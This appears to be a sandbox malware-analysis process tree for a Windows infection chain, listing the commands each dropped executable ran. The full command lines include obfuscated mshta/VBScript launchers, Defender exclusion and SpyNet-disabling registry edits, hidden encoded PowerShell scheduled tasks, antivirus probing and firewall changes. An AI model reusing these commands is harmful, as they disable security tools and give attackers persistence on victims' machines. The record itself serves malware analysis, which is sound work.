C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCrIpT: CLOSe(cREaTEobJECt ( "WsCRIpt.SHELL" ).run ( "cMD /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe"" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If """"== """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe"" ) do taskkill /iM ""%~nXV"" /F " , 0,trUE ) )5⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If ""== "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe" ) do taskkill /iM "%~nXV" /F6⤵
-
C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exeC9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCrIpT: CLOSe(cREaTEobJECt ( "WsCRIpt.SHELL" ).run ( "cMD /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe"" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If ""/PujgQ8Rc03_82Bzg ""== """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe"" ) do taskkill /iM ""%~nXV"" /F " , 0,trUE ) )8⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If "/PujgQ8Rc03_82Bzg "== "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe" ) do taskkill /iM "%~nXV" /F9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRIPt:close ( cREATeObJeCt ( "WSCRipt.SheLL" ). RuN( "C:\Windows\system32\cmd.exe /Q /c ECho | seT /P = ""MZ"" > _QRSLO9.L & CopY /b /Y _qRSLO9.L+ LxHL.t + EUH6BRBF.V + aKX0t5vQ.6Lm +KJ8R1EBO.NXR 7DPLg52t.~ & StaRT msiexec.exe /y .\7DPLG52t.~ " , 0,trUE ) )8⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c ECho | seT /P = "MZ" >_QRSLO9.L &CopY /b /Y _qRSLO9.L+ LxHL.t +EUH6BRBF.V+aKX0t5vQ.6Lm +KJ8R1EBO.NXR 7DPLg52t.~ & StaRT msiexec.exe /y .\7DPLG52t.~9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>_QRSLO9.L"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y .\7DPLG52t.~10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "Wed21e08690b2d5.exe" /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21d25f5841.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d25f5841.exeWed21d25f5841.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed218c3c4f53dbe01.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed218c3c4f53dbe01.exeWed218c3c4f53dbe01.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21d24a91bba8252.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exeWed21d24a91bba8252.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exeC:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21852ed61e6a343.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed2135bd1920.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214b8335df03a0f.exeWed214b8335df03a0f.exe1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\065ffed1-a0e1-4fb9-aa1e-5a6569453ab9" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"6⤵
-
C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"7⤵
-
C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build3.exe"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dXyl1h2kEhXgWB8VOfhl1BpG.exe"C:\Users\Admin\Pictures\Adobe Films\dXyl1h2kEhXgWB8VOfhl1BpG.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\XYAT0f2mxbcq323DID_U7lFu.exe"C:\Users\Admin\Pictures\Adobe Films\XYAT0f2mxbcq323DID_U7lFu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC66D.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD60D.tmp\Install.exe.\Install.exe /S /site_id "525403"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glMZmiFJT" /SC once /ST 02:48:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glMZmiFJT"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glMZmiFJT"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\ZLgVhFi.exe\" d8 /site_id 525403 /S" /V1 /F5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\s0E2ywOLPU4tRzP1Aeab6Hmc.exe"C:\Users\Admin\Pictures\Adobe Films\s0E2ywOLPU4tRzP1Aeab6Hmc.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\m76D27Rc3RtyxWBYhsjGBluV.exe"C:\Users\Admin\Pictures\Adobe Films\m76D27Rc3RtyxWBYhsjGBluV.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\uDDcuNpQTvTCz2c7PHxhjlvt.exe"C:\Users\Admin\Pictures\Adobe Films\uDDcuNpQTvTCz2c7PHxhjlvt.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 7763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 8323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 8003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 13803⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\bra6ubeAXX\Cleaner.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 13883⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\CQNw9xZ0E089eWPXNdTQEPf4.exe"C:\Users\Admin\Pictures\Adobe Films\CQNw9xZ0E089eWPXNdTQEPf4.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\pvRHfez8EvdvK81njOaBQPgs.exe"C:\Users\Admin\Documents\pvRHfez8EvdvK81njOaBQPgs.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\FVIN5GEmuT3vBSesV3KN4pMp.exe"C:\Users\Admin\Pictures\Adobe Films\FVIN5GEmuT3vBSesV3KN4pMp.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\robocopy.exerobocopy 89273873764872637456726738462763749829384862735682793849823849728345⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Provide.accdt & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NpDypcc$" Corner.accdt7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Quite.exe.pifQuite.exe.pif r7⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 57⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\rbSA3tUGFBdO0kRFgS_e15dr.exe"C:\Users\Admin\Pictures\Adobe Films\rbSA3tUGFBdO0kRFgS_e15dr.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS2035.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
- Modifies Windows Defender Real-time Protection settings
- Blocklisted process makes network request
- Executes dropped EXE
- Checks computer location settings
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBCHzxKYH" /SC once /ST 06:21:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBCHzxKYH"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBCHzxKYH"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\RjLTsSc.exe\" d8 /site_id 525403 /S" /V1 /F7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\sjKDfCT2kSQ4YhWPHKOoLmSB.exe"C:\Users\Admin\Pictures\Adobe Films\sjKDfCT2kSQ4YhWPHKOoLmSB.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8564 -s 4765⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\8dIv2siJec0bP7GeQg7IlcK8.exe"C:\Users\Admin\Pictures\Adobe Films\8dIv2siJec0bP7GeQg7IlcK8.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"C:\Users\Admin\Pictures\Adobe Films\wdEfSoLBh8dn_Si5mhnq4bhj.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\Cmw8lbMU1vbPEa32R4CNf5At.exe"C:\Users\Admin\Pictures\Adobe Films\Cmw8lbMU1vbPEa32R4CNf5At.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe"C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-091EG.tmp\joDqge54Tv9NCgW49aAyCCam.tmp"C:\Users\Admin\AppData\Local\Temp\is-091EG.tmp\joDqge54Tv9NCgW49aAyCCam.tmp" /SL5="$802C2,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\joDqge54Tv9NCgW49aAyCCam.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4cfb59221664617361 --downloadDate=2022-10-01T09:42:35 --distId=marketator --pid=7476⤵
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\870c7505-574a-4787-c9b6-0e0cce42bd25.run\__sentry-breadcrumb2" --initial-client-data=0x3fc,0x3c8,0x3cc,0x3d8,0x3d0,0x7ff6615fbc80,0x7ff6615fbca0,0x7ff6615fbcb87⤵
-
C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E7HAS.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-E7HAS.tmp\AdblockInstaller.tmp" /SL5="$3037C,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-9b21f88b-ac76-4996-9e9a-8a7b8019be21\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe"C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe"C:\Users\Admin\Pictures\Adobe Films\hubSc3jms7czq0qQMKpyvN61.exe" -h5⤵
-
C:\Users\Admin\Pictures\Adobe Films\lIYgJh5oH3Gd4X2XvUv7TRQa.exe"C:\Users\Admin\Pictures\Adobe Films\lIYgJh5oH3Gd4X2XvUv7TRQa.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 3445⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\aDP1V_OXS7NxUGwVfjDy2qub.exe"C:\Users\Admin\Pictures\Adobe Films\aDP1V_OXS7NxUGwVfjDy2qub.exe"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\eCZd8qB60HChZ6SA7X0pv44g.exe"C:\Users\Admin\Pictures\Adobe Films\eCZd8qB60HChZ6SA7X0pv44g.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 4565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 7885⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 8085⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 8685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 8765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 10005⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 4845⤵
- Program crash
